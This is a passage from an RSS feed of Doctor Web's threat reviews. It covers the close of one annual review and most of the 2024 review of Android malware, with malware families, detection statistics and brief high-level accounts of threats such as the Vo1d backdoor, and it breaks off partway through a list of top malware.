        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3851&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;, 
        and &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3994&lt;/b&gt;. At the same time, users encountered &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds.Aegis&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt; trojan variants capable of running automatically after installation. 
        Other widespread malicious programs were &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans, used in a variety of fraudulent schemes, and &lt;a href="https://vms.drweb.com/search/?q=Android.Spy&amp;lng=en"&gt;&lt;b&gt;Android.Spy&lt;/b&gt;&lt;/a&gt; spyware trojans.
    &lt;/p&gt;
    &lt;p&gt;
        The most active unwanted programs were members of the &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;, 
        &lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;, and &lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt; families. 
        The first ones offer users the opportunity to get virtual rewards by completing various tasks and then withdraw those rewards as real money. 
        However, users never receive any payments. The second ones are programs modified through a specialized cloud service. When modified, an uncontrolled 
        code and a number of dangerous permissions are added to them. The third ones are programs that imitate anti-virus software, detect nonexistent threats 
        and offer users the option to buy the full version to fix the “problems” that had allegedly been found.
    &lt;/p&gt;
    &lt;p&gt;
        &lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt; utilities, which allow Android apps to run without being installed, were once again the most commonly detected potentially dangerous software. 
        They accounted for more than a third of the detections of this type of threat. Also widespread were apps modified with the NP Manager tool (these are detected as 
        &lt;b&gt;Tool.NPMod&lt;/b&gt;). A special module is embedded into such modified programs, which allows them to bypass the digital signature verification process once they have been modified. 
        Apps protected with the 
        &lt;a href="https://vms.drweb.com/search/?q=Tool.Packer&amp;lng=en"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; software packer were also detected quite often, as was the &lt;a href="https://vms.drweb.com/search/?q=Tool.Androlua&amp;lng=en"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; framework. 
        The latter allows installed Android programs to be modified and potentially dangerous Lua scripts to be executed.
    &lt;/p&gt;
    &lt;p&gt;
        The most widespread adware software was the new family &lt;a href="https://vms.drweb.com/search/?q=Adware.ModAd&amp;lng=en"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;, which accounted for almost half of all detections. 
        These are specially modified versions of the WhatsApp messenger, whose functions have been injected with a specific code for loading advertising links. 
        Members of the &lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt; family ranked second, while another new family, 
        &lt;b&gt;Adware.Basement&lt;/b&gt;, occupied third place.
    &lt;/p&gt;
    &lt;p&gt;
        In 2024, Android banking trojans were slightly more active than in 2023. At the same time, our specialists observed an increase in the popularity 
        of some techniques used to protect malware from analysis and detection. This was commonly seen in banking trojans. Such techniques included undertaking various 
        manipulations with the ZIP file format (as Android APK files are based on this format) and the configuration file &lt;span class="string"&gt;AndroidManifest.xml&lt;/span&gt; of Android apps.
    &lt;/p&gt;
    &lt;p&gt;
        The widespread distribution of the &lt;b&gt;Android.SpyMax&lt;/b&gt; malicious program is worth a separate mention. Cybercriminals actively used this spyware trojan as a banking trojan, 
        particularly against Russian users (46.23% of detections), and also against Brazilian (35.46% of detections) and Turkish (5.80% of detections) Android device owners.
    &lt;/p&gt;
    &lt;p&gt;
        Throughout the year, Doctor Web’s virus analysts detected over 200 different threats on Google Play. Among them were trojans that subscribe users to paid services, 
        spyware trojans, and fraudulent and adware apps. Combined, they have been downloaded at least 26.7 million times. Moreover, our specialists detected another attack on 
        Android TV box sets: the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; backdoor has infected almost 1.3 million user devices in 197 countries. This trojan placed its components into the system 
        storage area and, when commanded, could covertly download third-party apps from the Internet and install them.
    &lt;/p&gt;
    &lt;p&gt;
        To find out more about the security-threat landscape for mobile devices in 2024, read our &lt;a href="https://news.drweb.com/show/review/?i=14970&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;special overview&lt;/a&gt;.
    &lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="future"&gt;
    &lt;h2 class="alignCenter"&gt;Prospects and possible trends&lt;/h2&gt;
    &lt;p&gt;
        The events of the past year have once again demonstrated the diversity of the modern cyber-threat landscape. Malicious actors are interested in both large targets, 
        like private corporate and government sector, and ordinary users. The functionality of many of the malicious programs used in the targeted attacks we investigated 
        indicates that virus writers are constantly searching for new opportunities to improve their methods of conducting malicious campaigns and developing their tools. 
        Over time, new techniques inevitably transfer to more widespread threats. In this regard, in 2025, we may witness the emergence of more trojans that use eBPF technology 
        to conceal their malicious activity. Moreover, we should also expect new targeted attacks, including those that utilize exploits.
    &lt;/p&gt;
    &lt;p&gt;
        One of the main goals of cybercriminals is to make money illegally, so 2025 may see an increase in the activity of banking and ad-displaying trojans. 
        In addition, users may be threatened by more malware with spyware functionality.
    &lt;/p&gt;
    &lt;p&gt;
        At the same time, not only Windows computer users will be the target, but also users of other operating systems, such as Linux and macOS. 
        The distribution of mobile threats will continue. Android device owners should above all be wary of the emergence of new spyware and banking 
        trojans as well as malicious and unwanted ad-displaying apps. New attempts to infect Android TVs, Android TV box sets, and other Android-based 
        devices are also to be expected. Moreover, chances are high that new threats will emerge on Google Play.
    &lt;/p&gt;

    &lt;!--AVP_BANNER start--&gt;
  &lt;div class="reviews-banners"&gt;
    &lt;a class="avp" href="https://www.drweb.com/pravda/issues/?lng=en" target="_blank"&gt;
        &lt;div class="avp__box avp__box--img"&gt;
            &lt;picture&gt;
                &lt;source srcset="https://st.drweb.com/static/new-www/review_banners/avp/avp-banner_885.png" media="(min-width: 885px)" /&gt;
                &lt;source srcset="https://st.drweb.com/static/new-www/review_banners/avp/avp-banner_768.png" media="(min-width: 768px)" /&gt;
                &lt;source srcset="https://st.drweb.com/static/new-www/review_banners/avp/avp-banner_480.png" media="(min-width: 480px)" /&gt;
                &lt;img class="avp__img" src="https://st.drweb.com/static/new-www/review_banners/avp/avp-banner_320.png" alt="The Anti-virus Times." /&gt;
            &lt;/picture&gt;
        &lt;/div&gt;
        &lt;div class="avp__box avp__box--content"&gt;
            &lt;div class="avp__box avp__box--text"&gt;
                &lt;h2 class="avp__title"&gt;The Anti-virus Times&lt;/h2&gt;
                &lt;h3 class="avp__subtitle"&gt;Infinite horizons&lt;/h3&gt;
            &lt;/div&gt;
            &lt;div class="avp__box avp__box--btn"&gt;
                &lt;button class="avp__btn"&gt;read&lt;/button&gt;
            &lt;/div&gt;
        &lt;/div&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;!--AVP_BANNER end--&gt;

&lt;/section&gt;

</description></item><item><guid>https://news.drweb.com/show/?i=14970&amp;lng=en</guid><title>Doctor Web’s review of virus activity on mobile devices in 2024</title><link>https://news.drweb.com/show/?i=14970&amp;lng=en&amp;c=9</link><pubDate>Thu, 30 Jan 2025 00:00:00 GMT</pubDate><description>


&lt;p&gt;&lt;b&gt;January 30, 2025&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
    &lt;p&gt;&lt;newslead&gt;In 2024, ad-displaying trojans were once again the most widespread Android threats. Fraudulent software, ransom trojans, clickers, and banking trojans were more active than in the previous year. Among the latter, compared to 2023, the most common were simple banking trojans that steal only online bank account access data and SMS confirmation codes.&lt;/newslead&gt;&lt;/p&gt;
    &lt;p&gt;
        Among the most active unwanted software programs were apps offering users the opportunity to complete various tasks in exchange 
        for virtual rewards, which can supposedly be converted into real money. The most commonly detected riskware apps were tools that 
        allow Android programs to launch without being installed. And the most active adware programs were specially modified WhatsApp 
        messenger versions whose functions had been injected with code for loading adware URLs.
    &lt;/p&gt;
    &lt;p&gt;
        Over the course of last year, Doctor Web's malware analysts discovered hundreds of new threats on Google Play, with over 26.7 million 
        cumulative downloads. Among these were malicious programs, including a spyware trojan, and unwanted and adware apps.
    &lt;/p&gt;
    &lt;p&gt;
        Our experts also uncovered a new attack on Android-based TV box sets. Around 1.3 million devices were affected by a backdoor 
        that infected the system storage and, when commanded by attackers, could download and install third-party software.
    &lt;/p&gt;
    &lt;p&gt;
        In addition, Doctor Web’s virus analysts noted the growing popularity of a number of techniques aimed at making Android 
        malware more complicated to analyze and more difficult for antiviruses to detect. These techniques included various 
        manipulations with the ZIP archive format (the APK files of Android apps are based on the ZIP format), manipulations with 
        the apps’ configuration file 
        &lt;span class="string"&gt;AndroidManifest.xml&lt;/span&gt;,
        and others. These methods were most often found to be used in banking trojans.
    &lt;/p&gt;

    &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
        &lt;h4 class="white alignCenter"&gt;PRINCIPAL TRENDS IN 2024&lt;/h4&gt;
        &lt;ul&gt;
            &lt;li&gt;Ad-displaying malware remained the most widespread threat;&lt;/li&gt;
            &lt;li&gt;An increase in banking trojan activity;&lt;/li&gt;
            &lt;li&gt;
                Cybercriminals increasingly used simple &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; 
                banking trojans, which steal only login data for online bank accounts and also verification codes from SMS;
            &lt;/li&gt;
            &lt;li&gt;
                Threat actors increasingly resorted to manipulating the format of APK apps and their structural components 
                to avoid being detected by anti-viruses and to make it more difficult for their malware to be analyzed;
            &lt;/li&gt;
            &lt;li&gt;An increase in the number of &lt;a href="https://vms.drweb.com/search/?q=Android.Locker&amp;lng=en"&gt;&lt;b&gt;Android.Locker&lt;/b&gt;&lt;/a&gt; ransomware trojans and &lt;a href="https://vms.drweb.com/search/?q=Android.Click&amp;lng=en"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt; trojan clickers;&lt;/li&gt;
            &lt;li&gt;The emergence of many new threats on Google Play.&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="events"&gt;
    &lt;h2 class="alignCenter"&gt;The most notable events of 2024&lt;/h2&gt;
    &lt;p&gt;
        Last May, Doctor Web’s experts 
        &lt;a href="https://news.drweb.com/show/?i=14860&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;informed&lt;/a&gt;
        users about the &lt;a href="https://vms.drweb.com/search/?q=Android.Click.414.origin&amp;lng=en"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt; trojan clicker, which was found in an app used to control sex toys 
        and in software for tracking physical activity. Both programs were distributed through Google Play and had more than 
        1.5 million installs combined. 
        &lt;a href="https://vms.drweb.com/search/?q=Android.Click.414.origin&amp;lng=en"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt; had a modular structure and used its components to execute certain tasks. 
        For example, the trojan covertly loaded advertising websites and performed various actions on them. It could 
        scroll webpages, enter text into forms, mute audio on webpages, and take screenshots of webpages to analyze 
        their contents and click on desired areas. In addition, &lt;a href="https://vms.drweb.com/search/?q=Android.Click.414.origin&amp;lng=en"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt; 
        sent detailed information about infected devices to its C&amp;C server. At the same time, the clicker did not 
        specifically attack certain users, and it did not start on devices where the interface language was set to Chinese.
    &lt;/p&gt;

    &lt;div class=" flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/01_Android.Click.414.origin_2024_1.png" class="preview"&gt;
              &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/01_Android.Click.414.origin_2024_1.1.png" alt="Android.Click_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/01_Android.Click.414.origin_2024_2.png" class="preview"&gt;
              &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/01_Android.Click.414.origin_2024_2.1.png" alt="Android.Click_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Some versions of the Love Spouse and QRunning programs had the &lt;b&gt;Android.Click.414.origin&lt;/b&gt; trojan hidden in them&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        In September, our specialists revealed the details of their 
        &lt;a href="https://news.drweb.com/show/?i=14900&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;analysis&lt;/a&gt;
        regarding cases of Android TV box sets being infected with the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; backdoor. 
        This modular malware affected nearly 1.3 million devices belonging to users in 197 countries. 
        It placed its components into the system storage area and could covertly download and install 
        third-party software when commanded by threat actors.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/02_Android.Vo1d_map_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/02_Android.Vo1d_map_en.png" alt="Android.Void_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Countries found to have the highest number of TV boxes infected with the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; backdoor&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Already in November, our virus analysts used &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; as an example 
        &lt;a href="https://news.drweb.com/show/?i=14935&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;to show&lt;/a&gt;
        how threat actors use the DNS protocol to covertly connect malware to C&amp;C servers. 
        &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; is a rather primitive trojan whose only task is to load target websites. 
        It differs from most of the threats similar to it in that it receives the addresses of target sites from the 
        TXT record of a malicious DNS server. For this, it uses the modified code of an open source dnsjava library. 
        At the same time, &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; 
        manifests its malicious nature only when connected to the Internet through certain providers; in other cases it operates as harmless software.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/03_Android.FakeApp.1669_c2_response.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/03_Android.FakeApp.1669_c2_response.png" alt="DNS_Trojan_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;An example of a target domain’s TXT record. It was sent by the DNS server upon request via the Linux ‘dig’ tool while one of the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; modifications was undergoing analysis&lt;/em&gt;&lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
    &lt;h2 class="alignCenter"&gt;Statistics&lt;/h2&gt;
    &lt;p&gt;
        According to detection statistics collected by Dr.Web Security Space for mobile devices, malicious programs were the threats most 
        commonly detected in 2024.They accounted for 74.67% of all registered detections. Adware programs, with a share of 10.96%, ranked 
        second. Riskware apps, which accounted for 10.55% of all detections, ranked third. The fourth most common threats were unwanted apps, 
        which users encountered in 3.82% of cases.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/04_threat_share_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/04_threat_share_2024_en.png" alt="Android_Danger_Stat_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    
    &lt;h3&gt;Malicious programs&lt;/h3&gt;
    &lt;p&gt;
        Once again the malicious Android apps most commonly encountered were ad-displaying trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family. 
        Over the course of last year, their share of the total number of malware programs detected by the Dr.Web anti-virus increased by 0.34 pp. to 31.95% of all detections.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/05_Android.HiddenAds_dynamics_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/05_Android.HiddenAds_dynamics_2024_en.png" alt="Android.Hidden.Ads_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        In this malware family, the most active member was &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3956&lt;/b&gt;
        (15.10% of the detections for the entire family and 4.84% of all malware detected). This is one of many variants of 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1994&lt;/b&gt; malware that users have been encountering for several years now. This particular version, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3956&lt;/b&gt;, emerged in 2023 along with other modifications. We 
        &lt;a href="https://news.drweb.com/show/review/?i=14846&amp;lng=en#stat" target="_blank" rel="noopener noreferrer"&gt;predicted&lt;/a&gt;
        that it could take a leading position in the family, which is what eventually happened. In 2024, its new variants also became widespread: 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3980&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3989&lt;/b&gt;, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3994&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;, and some others.
    &lt;/p&gt;
    &lt;p&gt;
        At the same time, our experts also noticed activity on the part of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds.Aegis&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt; subfamily. 
        Unlike most other &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; malware, members of this group have the ability to autorun and have some other
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds.Aegis&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;features&lt;/a&gt;. 
        Modifications like &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds.Aegis&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds.Aegis&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4.origin&lt;/b&gt;, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds.Aegis&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;, and &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds.Aegis&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; 
        were the ones most commonly detected on devices protected by Dr.Web anti-virus.
    &lt;/p&gt;
    &lt;p&gt;
        The second most widespread malicious programs were trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; 
        family, which cybercriminals use in various fraudulent schemes. Last year, they accounted for 
        18.28% of all malware detections, which is 16.45 pp. higher than the year before. Typically, 
        such trojans load unwanted websites designed for phishing attacks and online fraud.
    &lt;/p&gt;
    &lt;p&gt;
        &lt;a href="https://vms.drweb.com/search/?q=Android.Spy&amp;lng=en"&gt;&lt;b&gt;Android.Spy&lt;/b&gt;&lt;/a&gt; trojans, which have spyware functionality, ranked third with a share of 11.52%; 
        their share decreased by 16.7 pp., compared to 2023. As in the year before, the most common member of 
        this family was &lt;a href="https://vms.drweb.com/search/?q=Android.Spy.5106&amp;lng=en"&gt;&lt;b&gt;Android.Spy.5106&lt;/b&gt;&lt;/a&gt;. 
        It accounted for 5.95% of all detected malware.
    &lt;/p&gt;
    &lt;p&gt;
        In 2024, we observed a mixed trend in the distribution of malware that is designed to download and install other apps and capable 
        of executing arbitrary code. Compared to the previous year, the share of &lt;a href="https://vms.drweb.com/search/?q=Android.DownLoader&amp;lng=en"&gt;&lt;b&gt;Android.DownLoader&lt;/b&gt;&lt;/a&gt; downloader trojans decreased by 0.49 pp. 
        to 1.69%; the share of &lt;a href="https://vms.drweb.com/search/?q=Android.Mobifun&amp;lng=en"&gt;&lt;b&gt;Android.Mobifun&lt;/b&gt;&lt;/a&gt; trojans decreased by 0.15 pp. to 0.10%; and the share of &lt;a href="https://vms.drweb.com/search/?q=Android.Xiny&amp;lng=en"&gt;&lt;b&gt;Android.Xiny&lt;/b&gt;&lt;/a&gt; trojans decreased by 0.14 pp. to 0.13%. 
        At the same time, &lt;a href="https://vms.drweb.com/search/?q=Android.Triada&amp;lng=en"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.RemoteCode&amp;lng=en"&gt;&lt;b&gt;Android.RemoteCode&lt;/b&gt;&lt;/a&gt; trojans were detected more often. The number of detection cases for the former 
        increased by 0.6 pp. to 2.74%, and for the latter by 0.95 pp. to 3.78%.
    &lt;/p&gt;
    &lt;p&gt;
        The share of &lt;a href="https://vms.drweb.com/search/?q=Android.Packed&amp;lng=en"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt; malware protected by software packers decreased from 7.98% to 5.49%, nearly returning to the 2022 figure. 
        The number of attacks involving &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; adware trojans also decreased—from 10.06% to 5.38%. At the same time, the number of &lt;a href="https://vms.drweb.com/search/?q=Android.Locker&amp;lng=en"&gt;&lt;b&gt;Android.Locker&lt;/b&gt;&lt;/a&gt; 
        ransomware and &lt;a href="https://vms.drweb.com/search/?q=Android.Proxy&amp;lng=en"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt; trojan detections increased slightly—from 1.15% to 1.60% and from 0.57% to 0.81%, respectively. 
        &lt;a href="https://vms.drweb.com/search/?q=Android.Proxy&amp;lng=en"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt; trojans allow threat actors using infected Android devices to redirect their network traffic through them. In addition, the activity of 
        &lt;a href="https://vms.drweb.com/search/?q=Android.Click&amp;lng=en"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt; malicious programs increased significantly, from 0.82% to 3.56%. These trojans can open advertising websites and perform clicks on webpages.
    &lt;/p&gt;
    &lt;p&gt;The ten most commonly detected malicious programs in 2024:&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/06_top_malware_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/06_top_malware_2024_en.png" alt="Most_Common_Malware_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan app that loads a website that is hardcoded into its settings. Known modifications of this malicious program load an online casino site.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Spy.5106&amp;lng=en"&gt;&lt;b&gt;Android.Spy.5106&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for a trojan that presents itself as modified versions of unofficial WhatsApp messenger mods. This malicious program can steal the contents of notifications and offer users other apps from unknown sources for installation. And when such a modified messenger is used, it can also display dialog boxes containing remotely configurable content.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3956&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3851&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3994&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Trojan apps designed to display intrusive ads. Members of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family are often distributed as popular and harmless applications. In some cases, other malware can install them in the system directory. When these infect Android devices, they typically conceal their presence from the user. For example, they “hide” their icons from the home screen menu.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Click.1751&amp;lng=en"&gt;&lt;b&gt;Android.Click.1751&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
        &lt;dd&gt;This trojan is built into third-party WhatsApp messenger mods and camouflaged as Google library classes. While the host application is being used, &lt;a href="https://vms.drweb.com/search/?q=Android.Click.1751&amp;lng=en"&gt;&lt;b&gt;Android.Click.1751&lt;/b&gt;&lt;/a&gt; connects to one of the C&amp;C servers and receives two URLs from it. One of them is intended for Russian-speaking users, and the other is for everyone else. The trojan then displays a dialog box whose contents it has also received from a remote server. When a user clicks on the confirmation button, malware loads the corresponding link in the browser.&lt;/dd&gt;
